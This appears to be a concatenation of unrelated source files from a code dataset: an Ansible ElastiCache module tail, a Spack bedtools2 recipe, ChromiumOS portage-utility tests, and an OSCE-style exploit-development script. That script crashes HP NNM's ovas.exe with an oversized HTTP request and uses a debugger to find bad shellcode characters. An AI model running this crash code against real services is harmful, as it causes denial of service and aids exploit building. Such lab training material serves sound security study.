if module.params.get(not_allowed):
module.fail_json(msg = str("Parameter %s not allowed for state='absent'" % not_allowed))
# Retrieve any AWS settings from the environment.
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module)
if not region:
module.fail_json(msg = str("Either region or AWS_REGION or EC2_REGION environment variable or boto config aws_region or ec2_region must be set."))
"""Get an elasticache connection"""
try:
endpoint = "elasticache.%s.amazonaws.com" % region
connect_region = RegionInfo(name=region, endpoint=endpoint)
conn = ElastiCacheConnection(region=connect_region, **aws_connect_kwargs)
except boto.exception.NoAuthHandlerFound, e:
module.fail_json(msg=e.message)
try:
changed = False
exists = False
try:
matching_groups = conn.describe_cache_subnet_groups(group_name, max_records=100)
exists = len(matching_groups) > 0
except BotoServerError, e:
if e.error_code != 'CacheSubnetGroupNotFoundFault':
module.fail_json(msg = e.error_message)
if state == 'absent':
if exists:
conn.delete_cache_subnet_group(group_name)
changed = True
else:
if not exists:
new_group = conn.create_cache_subnet_group(group_name, cache_subnet_group_description=group_description, subnet_ids=group_subnets)
changed = True
else:
changed_group = conn.modify_cache_subnet_group(group_name, cache_subnet_group_description=group_description, subnet_ids=group_subnets)
changed = True
except BotoServerError, e:
if e.error_message != 'No modifications were requested.':
module.fail_json(msg = e.error_message)
else:
changed = False
module.exit_json(changed=changed)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
main()
|
gpl-3.0
|
greyshell/Exploit-Dev
|
badchar_detection_automated/badchar_detection_HPNNM_B.07.53.py
|
1
|
10148
|
#!/usr/bin/env python2
# reference: CTP/OSCE
# author: greyshell
# description: identify good and bad chars in HPNNM-B.07.53
# dependency: python version: 2.7.x, pyenv-win==1.2.2, pywin32==218, WMI==1.4.9, pydbg
# 1) download the `dependency.zip` file.
# 2) extract the `pydbg.zip` inside your python `lib\site-packages` directory.
# 3) install `pywin32-218.win32-py2.7.exe` and `WMI-1.4.9.win32.exe`.
import os
import socket
import subprocess
import threading
import time
import wmi
from pydbg import *
from pydbg.defines import *
# global variables
all_chars = (
"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13"
"\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26"
"\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39"
"\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c"
"\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72"
"\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85"
"\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98"
"\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab"
"\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe"
"\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1"
"\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4"
"\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7"
"\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
request_template = (
"GET /topology/homeBaseView HTTP/1.1\r\n"
"Host: {}\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_03\r\n"
"Content-Length: 1048580\r\n\r\n"
)
# current char that is being checked
cur_char = ""
bad_chars = []
good_chars = []
evil_str_sent = False
service_is_running = False
def chars_to_str(chars):
# convert a list of chars to a string
result = ""
for char in chars:
result += "\\x{:02x}".format(ord(char))
return result
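# Worked example (illustrative): with the function above,
# chars_to_str(["A", "\x00"]) returns the string "\x41\x00", the same notation
# used in the good/bad char reports and output files below.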
def crash_service():
    # send malformed data to the ovas service in order to crash it; this function runs in an independent thread
global evil_str_sent, cur_char, bad_chars, good_chars, all_chars
global service_is_running
char_counter = -1
timer = 0
while True:
# don't send evil string if process is not running
if not service_is_running:
time.sleep(1)
continue
# if main loop reset the evil_str_sent flag to False, sent evil_str again
if not evil_str_sent:
timer = 0
char_counter += 1
if char_counter > len(all_chars) - 1:
print("[+] bad chars: {}.".format(chars_to_str(bad_chars)))
print("[+] good chars: {}.".format(chars_to_str(good_chars)))
print("[+] done.")
# hack to exit application from non-main thread
os._exit(0)
cur_char = all_chars[char_counter]
# during crash [ESP + 4C] points to ("A" * 1025)th position
crash = "A" * 1025 + cur_char * 4 + "B" * 2551
evil_str = request_template.format(crash)
print("[+] sending evil HTTP request...")
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("127.0.0.1", 7510))
sock.send(evil_str)
sock.close()
except Exception as e:
print("[+] error sending malicious buffer, service may be down.")
print("[+] restarting the service and retrying...")
print(e)
service_is_running = False
subprocess.Popen('taskkill /f /im ovas.exe').communicate()
finally:
evil_str_sent = True
else:
if timer > 10:
print("[+] 10 seconds passed without a crash. Bad char probably prevented the crash.")
print("[+] marking last char as bad and killing the service...")
bad_chars.append(cur_char)
print("[+] bad chars so far: {}.".format(chars_to_str(bad_chars)))
with open("bad_chars.txt", 'w') as f:
f.write(chars_to_str(bad_chars))
service_is_running = False
subprocess.Popen('taskkill /f /im ovas.exe').communicate()
time.sleep(1)
timer += 1
return
def is_service_started():
# check if service was successfully started
print("[+] making sure the service was restarted...")
service_check_counter = 0
while not service_is_running:
if service_check_counter > 4: # give it 5 attempts
return False
for process in wmi.WMI().Win32_Process():
if process.Name == 'ovas.exe':
return process.ProcessId
service_check_counter += 1
time.sleep(1)
def is_service_responsive():
# check if service responds to HTTP requests
print("[+] making sure the service responds to HTTP requests...")
service_check_counter = 0
while not service_is_running:
# give it 5 attempts
if service_check_counter > 4:
return False
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("127.0.0.1", 7510))
test_str = request_template.format("127.0.0.1")
sock.send(test_str)
# give response 1 second to arrive
sock.settimeout(1.0)
resp = sock.recv(1024)
if resp:
return True
sock.close()
except Exception as e:
print(e)
service_check_counter += 1
def restart_service():
# restart ovas.exe service and return its PID
global service_is_running
service_is_running = False
# check that the service is running before stopping it
for process in wmi.WMI().Win32_Process():
if process.Name == 'ovas.exe':
print("[+] stopping the service...")
# forcefully terminate the process
subprocess.Popen('taskkill /f /im ovas.exe').communicate()
print("[+] starting the service...")
    # restart the service cleanly: stop with ovstop, then start with ovstart
subprocess.Popen('ovstop -c ovas').communicate()
subprocess.Popen('ovstart -c ovas').communicate()
pid = is_service_started()
if pid:
print("[+] the service was restarted.")
else:
print("[-] service was not found in process list. Restarting...")
return restart_service()
if is_service_responsive():
print("[+] service responds to HTTP requests. Green ligth.")
service_is_running = True
return pid
else:
print("[-] service does not respond to HTTP requests. Restarting...")
return restart_service()
def check_char(raw_data):
# compare the buffer sent with the one in memory to see if it has been mangled in order to identify bad characters.
global bad_chars, good_chars
hex_data = dbg.hex_dump(raw_data)
print("[+] buffer: {}".format(hex_data))
# sent data must be equal to data in memory
if raw_data == (cur_char * 4):
good_chars.append(cur_char)
print("[+] char {} is good.".format(chars_to_str(cur_char)))
print("[+] good chars so far: {}.".format(chars_to_str(good_chars)))
with open("good_chars.txt", 'w') as f:
f.write(chars_to_str(good_chars))
else:
bad_chars.append(cur_char)
print("[+] char {} is bad.".format(chars_to_str(cur_char)))
print("[+] bad chars so far: {}.".format(chars_to_str(bad_chars)))
with open("bad_chars.txt", 'w') as f:
f.write(chars_to_str(bad_chars))
return
def _access_violation_handler(dbg):
# on access violation read data from a pointer on the stack to determine if the sent buffer was mangled in any way
print("[+] Access violation caught.")
# [ESP + 0x4C] points to our test buffer
esp_offset = 0x4C
buf_address = dbg.read(dbg.context.Esp + esp_offset, 0x4)
buf_address = dbg.flip_endian_dword(buf_address)
print("[+] [DEBUG] buf_address: {}".format(buf_address))
if buf_address:
# read 4 bytes test buffer
buffer = dbg.read(buf_address, 0x4)
print("[+] buffer is " + buffer)
else:
        # When the first request sent is the service-responsiveness check,
        # buf_address sometimes comes back as 0; handle that case here.
buffer = ""
print("[+] checking whether the char is good or bad...")
check_char(buffer)
dbg.detach()
# noinspection PyUnresolvedReferences
return DBG_EXCEPTION_NOT_HANDLED
def debug_process(pid):
    # create a debugger instance and attach to the ovas PID
# noinspection PyUnresolvedReferences
dbg = pydbg()
# noinspection PyUnresolvedReferences
dbg.set_callback(EXCEPTION_ACCESS_VIOLATION, _access_violation_handler)
while True:
try:
print("[+] attaching debugger to pid: {}.".format(pid))
if dbg.attach(pid):
return dbg
else:
return False
except Exception as e:
print("[+] error while attaching: {}.".format(e.message))
return False
if __name__ == '__main__':
# create and start crasher thread
crasher_thread = threading.Thread(target=crash_service)
crasher_thread.setDaemon(0)
crasher_thread.start()
print("[+] thread started")
# main loop
while True:
pid = restart_service()
print("[+] restart_service " + str(pid))
dbg = debug_process(pid)
print("[+] dbg started")
if dbg:
# tell crasher thread to send malicious input to process
evil_str_sent = False
# enter the debugging loop
dbg.run()
|
mit
|
iulian787/spack
|
var/spack/repos/builtin/packages/bedtools2/package.py
|
1
|
1337
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Bedtools2(Package):
"""Collectively, the bedtools utilities are a swiss-army knife of
tools for a wide-range of genomics analysis tasks. The most
widely-used tools enable genome arithmetic: that is, set theory
on the genome."""
homepage = "https://github.com/arq5x/bedtools2"
url = "https://github.com/arq5x/bedtools2/archive/v2.26.0.tar.gz"
version('2.29.2', sha256='bc2f36b5d4fc9890c69f607d54da873032628462e88c545dd633d2c787a544a5')
version('2.27.1', sha256='edcac089d84e63a51f85c3c189469daa7d42180272130b046856faad3cf79112')
version('2.27.0', sha256='e91390b567e577d337c15ca301e264b0355441f5ab90fa4f971622e3043e0ca0')
version('2.26.0', sha256='15db784f60a11b104ccbc9f440282e5780e0522b8d55d359a8318a6b61897977')
version('2.25.0', sha256='159122afb9978015f7ec85d7b17739b01415a5738086b20a48147eeefcf08cfb')
version('2.23.0', sha256='9dacaa561d11ce9835d1d51e5aeb092bcbe117b7119663ec9a671abac6a36056')
depends_on('zlib')
depends_on('python', type='build')
def install(self, spec, prefix):
make("prefix=%s" % prefix, "install")
|
lgpl-2.1
|
windyuuy/opera
|
chromium/src/third_party/chromite/buildbot/portage_utilities_unittest.py
|
2
|
25507
|
#!/usr/bin/python
# Copyright (c) 2012 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unit tests for portage_utilities.py."""
import fileinput
import mox
import os
import sys
import constants
if __name__ == '__main__':
sys.path.insert(0, constants.SOURCE_ROOT)
from chromite.lib import cros_build_lib
from chromite.lib import cros_test_lib
from chromite.lib import git
from chromite.lib import osutils
from chromite.buildbot import portage_utilities
# pylint: disable=W0212
MANIFEST = git.ManifestCheckout.Cached(constants.SOURCE_ROOT)
class _Package(object):
def __init__(self, package):
self.package = package
class _DummyCommandResult(object):
"""Create mock RunCommand results."""
def __init__(self, output):
# Members other than 'output' are expected to be unused, so
# we omit them here.
#
# All shell output will be newline terminated; we add the
# newline here for convenience.
self.output = output + '\n'
class EBuildTest(cros_test_lib.MoxTestCase):
def _makeFakeEbuild(self, fake_ebuild_path, fake_ebuild_content=''):
self.mox.StubOutWithMock(fileinput, 'input')
fileinput.input(fake_ebuild_path).AndReturn(fake_ebuild_content)
self.mox.ReplayAll()
fake_ebuild = portage_utilities.EBuild(fake_ebuild_path)
self.mox.VerifyAll()
return fake_ebuild
def testParseEBuildPath(self):
# Test with ebuild with revision number.
fake_ebuild_path = '/path/to/test_package/test_package-0.0.1-r1.ebuild'
fake_ebuild = self._makeFakeEbuild(fake_ebuild_path)
self.assertEquals(fake_ebuild._category, 'to')
self.assertEquals(fake_ebuild._pkgname, 'test_package')
self.assertEquals(fake_ebuild.version_no_rev, '0.0.1')
self.assertEquals(fake_ebuild.current_revision, 1)
self.assertEquals(fake_ebuild.version, '0.0.1-r1')
self.assertEquals(fake_ebuild.package, 'to/test_package')
self.assertEquals(fake_ebuild._ebuild_path_no_version,
'/path/to/test_package/test_package')
self.assertEquals(fake_ebuild.ebuild_path_no_revision,
'/path/to/test_package/test_package-0.0.1')
self.assertEquals(fake_ebuild._unstable_ebuild_path,
'/path/to/test_package/test_package-9999.ebuild')
self.assertEquals(fake_ebuild.ebuild_path, fake_ebuild_path)
def testParseEBuildPathNoRevisionNumber(self):
# Test with ebuild without revision number.
fake_ebuild_path = '/path/to/test_package/test_package-9999.ebuild'
fake_ebuild = self._makeFakeEbuild(fake_ebuild_path)
self.assertEquals(fake_ebuild._category, 'to')
self.assertEquals(fake_ebuild._pkgname, 'test_package')
self.assertEquals(fake_ebuild.version_no_rev, '9999')
self.assertEquals(fake_ebuild.current_revision, 0)
self.assertEquals(fake_ebuild.version, '9999')
self.assertEquals(fake_ebuild.package, 'to/test_package')
self.assertEquals(fake_ebuild._ebuild_path_no_version,
'/path/to/test_package/test_package')
self.assertEquals(fake_ebuild.ebuild_path_no_revision,
'/path/to/test_package/test_package-9999')
self.assertEquals(fake_ebuild._unstable_ebuild_path,
'/path/to/test_package/test_package-9999.ebuild')
self.assertEquals(fake_ebuild.ebuild_path, fake_ebuild_path)
def testGetCommitId(self):
fake_sources = '/path/to/sources'
fake_hash = '24ab3c9f6d6b5c744382dba2ca8fb444b9808e9f'
fake_ebuild_path = '/path/to/test_package/test_package-9999.ebuild'
fake_ebuild = self._makeFakeEbuild(fake_ebuild_path)
# git rev-parse HEAD
self.mox.StubOutWithMock(cros_build_lib, 'RunCommandCaptureOutput')
result = _DummyCommandResult(fake_hash)
cros_build_lib.RunCommandCaptureOutput(
mox.IgnoreArg(),
cwd=mox.IgnoreArg(),
print_cmd=portage_utilities.EBuild.VERBOSE).AndReturn(result)
self.mox.ReplayAll()
test_hash = fake_ebuild.GetCommitId(fake_sources)
self.mox.VerifyAll()
self.assertEquals(test_hash, fake_hash)
def testEBuildStable(self):
"""Test ebuild w/keyword variations"""
fake_ebuild_path = '/path/to/test_package/test_package-9999.ebuild'
datasets = (
('~amd64', False),
('amd64', True),
('~amd64 ~arm ~x86', False),
('~amd64 arm ~x86', True),
('-* ~arm', False),
('-* x86', True),
)
for keywords, stable in datasets:
fake_ebuild = self._makeFakeEbuild(
fake_ebuild_path, fake_ebuild_content=['KEYWORDS="%s"\n' % keywords])
self.assertEquals(fake_ebuild.is_stable, stable)
self.mox.UnsetStubs()
def testEBuildBlacklisted(self):
"""Test blacklisted ebuild"""
fake_ebuild_path = '/path/to/test_package/test_package-9999.ebuild'
fake_ebuild = self._makeFakeEbuild(fake_ebuild_path)
self.assertEquals(fake_ebuild.is_blacklisted, False)
self.mox.UnsetStubs()
fake_ebuild = self._makeFakeEbuild(
fake_ebuild_path, fake_ebuild_content=['CROS_WORKON_BLACKLIST="1"\n'])
self.assertEquals(fake_ebuild.is_blacklisted, True)
class ProjectAndPathTest(cros_test_lib.MoxTempDirTestCase):
def _MockParseWorkonVariables(self, fake_projects, _fake_localname,
_fake_subdir, fake_ebuild_contents):
"""Mock the necessary calls, start Replay mode, call GetSourcePath()."""
# pylint: disable=E1120
self.mox.StubOutWithMock(os.path, 'isdir')
self.mox.StubOutWithMock(portage_utilities.EBuild, 'GetGitProjectName')
# We need 'chromeos-base' here because it controls default _SUBDIR values.
ebuild_path = os.path.join(self.tempdir, 'chromeos-base', 'package',
'package-9999.ebuild')
osutils.WriteFile(ebuild_path, fake_ebuild_contents, makedirs=True)
for p in fake_projects:
os.path.isdir(mox.IgnoreArg()).AndReturn(True)
portage_utilities.EBuild.GetGitProjectName(
MANIFEST, mox.IgnoreArg()).AndReturn(p)
self.mox.ReplayAll()
ebuild = portage_utilities.EBuild(ebuild_path)
result = ebuild.GetSourcePath(self.tempdir, MANIFEST)
self.mox.VerifyAll()
return result
def testParseLegacyWorkonVariables(self):
"""Tests if ebuilds in a single item format are correctly parsed."""
fake_project = 'my_project1'
fake_localname = 'foo'
fake_subdir = 'bar'
fake_ebuild_contents = """
CROS_WORKON_PROJECT=%s
CROS_WORKON_LOCALNAME=%s
CROS_WORKON_SUBDIR=%s
""" % (fake_project, fake_localname, fake_subdir)
project, subdir = self._MockParseWorkonVariables(
[fake_project], [fake_localname], [fake_subdir], fake_ebuild_contents)
self.assertEquals(project, [fake_project])
self.assertEquals(subdir, [os.path.join(
self.tempdir, 'platform', '%s/%s' % (fake_localname, fake_subdir))])
def testParseArrayWorkonVariables(self):
"""Tests if ebuilds in an array format are correctly parsed."""
fake_projects = ['my_project1', 'my_project2', 'my_project3']
fake_localname = ['foo', 'bar', 'bas']
fake_subdir = ['sub1', 'sub2', 'sub3']
# The test content is formatted using the same function that
# formats ebuild output, ensuring that we can parse our own
# products.
fake_ebuild_contents = """
CROS_WORKON_PROJECT=%s
CROS_WORKON_LOCALNAME=%s
CROS_WORKON_SUBDIR=%s
""" % (portage_utilities.EBuild.FormatBashArray(fake_projects),
portage_utilities.EBuild.FormatBashArray(fake_localname),
portage_utilities.EBuild.FormatBashArray(fake_subdir))
project, subdir = self._MockParseWorkonVariables(
fake_projects, fake_localname, fake_subdir, fake_ebuild_contents)
self.assertEquals(project, fake_projects)
fake_path = ['%s/%s' % (fake_localname[i], fake_subdir[i])
for i in range(0, len(fake_projects))]
fake_path = map(lambda x: os.path.realpath(
os.path.join(self.tempdir, 'platform', x)), fake_path)
self.assertEquals(subdir, fake_path)
class StubEBuild(portage_utilities.EBuild):
def __init__(self, path):
super(StubEBuild, self).__init__(path)
self.is_workon = True
self.is_stable = True
def _ReadEBuild(self, path):
pass
def GetCommitId(self, srcpath):
id_map = {
'p1_path' : 'my_id',
'p1_path1' : 'my_id1',
'p1_path2' : 'my_id2'
}
if srcpath in id_map:
return id_map[srcpath]
else:
return 'you_lose'
class EBuildRevWorkonTest(cros_test_lib.MoxTempDirTestCase):
# Lines that we will feed as fake ebuild contents to
  # EBuild.MarkAsStable(). This is the minimum content needed
# to test the various branches in the function's main processing
# loop.
_mock_ebuild = ['EAPI=2\n',
'CROS_WORKON_COMMIT=old_id\n',
'KEYWORDS=\"~x86 ~arm ~amd64\"\n',
'src_unpack(){}\n']
_mock_ebuild_multi = ['EAPI=2\n',
'CROS_WORKON_COMMIT=("old_id1","old_id2")\n',
'KEYWORDS=\"~x86 ~arm ~amd64\"\n',
'src_unpack(){}\n']
def setUp(self):
self.overlay = '/sources/overlay'
package_name = os.path.join(self.overlay,
'category/test_package/test_package-0.0.1')
ebuild_path = package_name + '-r1.ebuild'
self.m_ebuild = StubEBuild(ebuild_path)
self.revved_ebuild_path = package_name + '-r2.ebuild'
def createRevWorkOnMocks(self, ebuild_content, rev, multi=False):
# pylint: disable=E1120
self.mox.StubOutWithMock(os.path, 'exists')
self.mox.StubOutWithMock(cros_build_lib, 'Die')
self.mox.StubOutWithMock(portage_utilities.shutil, 'copyfile')
self.mox.StubOutWithMock(os, 'unlink')
self.mox.StubOutWithMock(portage_utilities.EBuild, '_RunCommand')
self.mox.StubOutWithMock(cros_build_lib, 'RunCommand')
self.mox.StubOutWithMock(portage_utilities.filecmp, 'cmp')
self.mox.StubOutWithMock(portage_utilities.fileinput, 'input')
self.mox.StubOutWithMock(portage_utilities.EBuild, 'GetVersion')
self.mox.StubOutWithMock(portage_utilities.EBuild, 'GetSourcePath')
self.mox.StubOutWithMock(portage_utilities.EBuild, 'GetTreeId')
if multi:
portage_utilities.EBuild.GetSourcePath('/sources', MANIFEST).AndReturn(
(['fake_project1','fake_project2'], ['p1_path1','p1_path2']))
else:
portage_utilities.EBuild.GetSourcePath('/sources', MANIFEST).AndReturn(
(['fake_project1'], ['p1_path']))
portage_utilities.EBuild.GetVersion('/sources', MANIFEST,
'0.0.1').AndReturn('0.0.1')
if multi:
portage_utilities.EBuild.GetTreeId('p1_path1').AndReturn('treehash1')
portage_utilities.EBuild.GetTreeId('p1_path2').AndReturn('treehash2')
else:
portage_utilities.EBuild.GetTreeId('p1_path').AndReturn('treehash')
ebuild_9999 = self.m_ebuild._unstable_ebuild_path
os.path.exists(ebuild_9999).AndReturn(True)
# These calls come from MarkAsStable()
portage_utilities.shutil.copyfile(ebuild_9999, self.revved_ebuild_path)
m_file = self.mox.CreateMock(file)
portage_utilities.fileinput.input(self.revved_ebuild_path,
inplace=1).AndReturn(ebuild_content)
m_file.write('EAPI=2\n')
if multi:
m_file.write('CROS_WORKON_COMMIT=("my_id1" "my_id2")\n')
m_file.write('CROS_WORKON_TREE=("treehash1" "treehash2")\n')
else:
m_file.write('CROS_WORKON_COMMIT="my_id"\n')
m_file.write('CROS_WORKON_TREE="treehash"\n')
m_file.write('KEYWORDS=\"x86 arm amd64\"\n')
m_file.write('src_unpack(){}\n')
# MarkAsStable() returns here
portage_utilities.filecmp.cmp(self.m_ebuild.ebuild_path,
self.revved_ebuild_path,
shallow=False).AndReturn(not rev)
if rev:
portage_utilities.EBuild._RunCommand(
['git', 'add', self.revved_ebuild_path],
cwd=self.overlay)
if self.m_ebuild.is_stable:
portage_utilities.EBuild._RunCommand(
['git', 'rm', self.m_ebuild.ebuild_path],
cwd=self.overlay)
else:
os.unlink(self.revved_ebuild_path)
return m_file
def testRevWorkOnEBuild(self):
"""Test Uprev of a single project ebuild."""
m_file = self.createRevWorkOnMocks(self._mock_ebuild, rev=True)
self.mox.ReplayAll()
result = self.m_ebuild.RevWorkOnEBuild('/sources', MANIFEST,
redirect_file=m_file)
self.mox.VerifyAll()
self.assertEqual(result, 'category/test_package-0.0.1-r2')
def testRevWorkOnMultiEBuild(self):
"""Test Uprev of a multi-project (array) ebuild."""
m_file = self.createRevWorkOnMocks(self._mock_ebuild_multi, rev=True,
multi=True)
self.mox.ReplayAll()
result = self.m_ebuild.RevWorkOnEBuild('/sources', MANIFEST,
redirect_file=m_file)
self.mox.VerifyAll()
self.assertEqual(result, 'category/test_package-0.0.1-r2')
def testRevUnchangedEBuild(self):
m_file = self.createRevWorkOnMocks(self._mock_ebuild, rev=False)
self.mox.ReplayAll()
result = self.m_ebuild.RevWorkOnEBuild('/sources', MANIFEST,
redirect_file=m_file)
self.mox.VerifyAll()
self.assertEqual(result, None)
def testRevMissingEBuild(self):
self.revved_ebuild_path = self.m_ebuild.ebuild_path
self.m_ebuild.ebuild_path = self.m_ebuild._unstable_ebuild_path
self.m_ebuild.current_revision = 0
self.m_ebuild.is_stable = False
m_file = self.createRevWorkOnMocks(
self._mock_ebuild[0:1] + self._mock_ebuild[2:], rev=True)
self.mox.ReplayAll()
result = self.m_ebuild.RevWorkOnEBuild('/sources', MANIFEST,
redirect_file=m_file)
self.mox.VerifyAll()
self.assertEqual(result, 'category/test_package-0.0.1-r1')
def testCommitChange(self):
self.mox.StubOutWithMock(cros_build_lib, 'RunCommand')
mock_message = 'Commitme'
cros_build_lib.RunCommand(
['git', 'commit', '-a', '-m', mock_message], cwd='.', print_cmd=False)
self.mox.ReplayAll()
self.m_ebuild.CommitChange(mock_message, '.')
self.mox.VerifyAll()
def testUpdateCommitHashesForChanges(self):
"""Tests that we can update the commit hashes for changes correctly."""
cls = portage_utilities.EBuild
ebuild1 = self.mox.CreateMock(cls)
ebuild1.ebuild_path = 'public_overlay/ebuild.ebuild'
ebuild1.package = 'test/project'
self.mox.StubOutWithMock(portage_utilities, 'FindOverlays')
self.mox.StubOutWithMock(cls, '_GetEBuildProjects')
self.mox.StubOutWithMock(cls, '_GetSHA1ForProject')
self.mox.StubOutWithMock(cls, 'UpdateEBuild')
self.mox.StubOutWithMock(cls, 'CommitChange')
self.mox.StubOutWithMock(cls, 'GitRepoHasChanges')
build_root = 'fakebuildroot'
overlays = ['public_overlay']
changes = ['fake change']
projects = ['fake_project1', 'fake_project2']
project_ebuilds = {ebuild1: projects}
portage_utilities.FindOverlays(
constants.BOTH_OVERLAYS, buildroot=build_root).AndReturn(overlays)
cls._GetEBuildProjects(build_root, mox.IgnoreArg(), overlays,
changes).AndReturn(project_ebuilds)
for i, p in enumerate(projects):
cls._GetSHA1ForProject(mox.IgnoreArg(), p).InAnyOrder().AndReturn(str(i))
cls.UpdateEBuild(ebuild1.ebuild_path, dict(CROS_WORKON_COMMIT='("0" "1")'))
cls.GitRepoHasChanges('public_overlay').AndReturn(True)
cls.CommitChange(mox.IgnoreArg(), overlay='public_overlay')
self.mox.ReplayAll()
cls.UpdateCommitHashesForChanges(changes, build_root, MANIFEST)
self.mox.VerifyAll()
def testGitRepoHasChanges(self):
"""Tests that GitRepoHasChanges works correctly."""
cros_build_lib.RunCommand(
['git', 'clone', '--depth=1',
'file://' + os.path.join(constants.SOURCE_ROOT, 'chromite'),
self.tempdir])
# No changes yet as we just cloned the repo.
self.assertFalse(portage_utilities.EBuild.GitRepoHasChanges(self.tempdir))
# Update metadata but no real changes.
osutils.Touch(os.path.join(self.tempdir, 'LICENSE'))
self.assertFalse(portage_utilities.EBuild.GitRepoHasChanges(self.tempdir))
# A real change.
osutils.WriteFile(os.path.join(self.tempdir, 'LICENSE'), 'hi')
self.assertTrue(portage_utilities.EBuild.GitRepoHasChanges(self.tempdir))
class FindOverlaysTest(cros_test_lib.MoxTestCase):
FAKE, MARIO = 'fake-board', 'x86-mario'
PRIVATE = constants.PRIVATE_OVERLAYS
PUBLIC = constants.PUBLIC_OVERLAYS
BOTH = constants.BOTH_OVERLAYS
def setUp(self):
"""Fetch all overlays."""
self.overlays = {}
for b in (None, self.FAKE, self.MARIO):
self.overlays[b] = d = {}
for o in (self.PRIVATE, self.PUBLIC, self.BOTH, None):
d[o] = portage_utilities.FindOverlays(o, b, constants.SOURCE_ROOT)
self.no_overlays = not bool(any(d.values()))
def testMissingPrimaryOverlay(self):
"""Test what happens when a primary overlay is missing.
If the overlay doesn't exist, FindOverlays should throw a
MissingOverlayException.
"""
self.assertRaises(portage_utilities.MissingOverlayException,
portage_utilities.FindPrimaryOverlay, self.BOTH,
self.FAKE, constants.SOURCE_ROOT)
def testDuplicates(self):
"""Verify that no duplicate overlays are returned."""
for d in self.overlays.itervalues():
for overlays in d.itervalues():
self.assertEqual(len(overlays), len(set(overlays)))
def testOverlaysExist(self):
"""Verify that all overlays returned actually exist on disk."""
for d in self.overlays.itervalues():
for overlays in d.itervalues():
self.assertTrue(all(os.path.isdir(x) for x in overlays))
def testPrivatePublicOverlayTypes(self):
"""Verify public/private filtering.
If we ask for results from 'both overlays', we should
find all public and all private overlays.
There should always be at least one public overlay. (Note:
there may not be any private overlays, e.g. if the user has
a public checkout.)
"""
if self.no_overlays:
return
for d in self.overlays.itervalues():
self.assertTrue(set(d[self.BOTH]) >= set(d[self.PUBLIC]))
self.assertTrue(set(d[self.BOTH]) > set(d[self.PRIVATE]))
self.assertTrue(set(d[self.PUBLIC]).isdisjoint(d[self.PRIVATE]))
def testNoOverlayType(self):
"""If we specify overlay_type=None, no results should be returned."""
self.assertTrue(all(d[None] == [] for d in self.overlays.itervalues()))
def testNonExistentBoard(self):
"""Test what happens when a non-existent board is supplied.
If we specify a non-existent board to FindOverlays, only generic
overlays should be returned.
"""
if self.no_overlays:
return
for o in (self.PUBLIC, self.BOTH):
self.assertTrue(set(self.overlays[self.FAKE][o]) <
set(self.overlays[self.MARIO][o]))
def testAllBoards(self):
"""If we specify board=None, all overlays should be returned."""
if self.no_overlays:
return
for o in (self.PUBLIC, self.BOTH):
for b in (self.FAKE, self.MARIO):
self.assertTrue(set(self.overlays[b][o]) < set(self.overlays[None][o]))
def testMarioPrimaryOverlay(self):
"""Verify that mario has a primary overlay.
Further, the only difference between the public overlays for mario and a
fake board is the primary overlay, which is listed last.
"""
if self.no_overlays:
return
mario_primary = portage_utilities.FindPrimaryOverlay(self.BOTH, self.MARIO,
constants.SOURCE_ROOT)
self.assertTrue(mario_primary in self.overlays[self.MARIO][self.BOTH])
self.assertTrue(mario_primary not in self.overlays[self.FAKE][self.BOTH])
self.assertEqual(mario_primary, self.overlays[self.MARIO][self.PUBLIC][-1])
self.assertEqual(self.overlays[self.MARIO][self.PUBLIC][:-1],
self.overlays[self.FAKE][self.PUBLIC])
class BuildEBuildDictionaryTest(cros_test_lib.MoxTestCase):
def setUp(self):
self.mox.StubOutWithMock(os, 'walk')
self.mox.StubOutWithMock(cros_build_lib, 'RunCommand')
self.package = 'chromeos-base/test_package'
self.root = '/overlay/chromeos-base/test_package'
self.package_path = self.root + '/test_package-0.0.1.ebuild'
paths = [[self.root, [], []]]
os.walk("/overlay").AndReturn(paths)
self.mox.StubOutWithMock(portage_utilities, '_FindUprevCandidates')
def testWantedPackage(self):
overlays = {"/overlay": []}
package = _Package(self.package)
portage_utilities._FindUprevCandidates([]).AndReturn(package)
self.mox.ReplayAll()
portage_utilities.BuildEBuildDictionary(overlays, False, [self.package])
self.mox.VerifyAll()
self.assertEquals(len(overlays), 1)
self.assertEquals(overlays["/overlay"], [package])
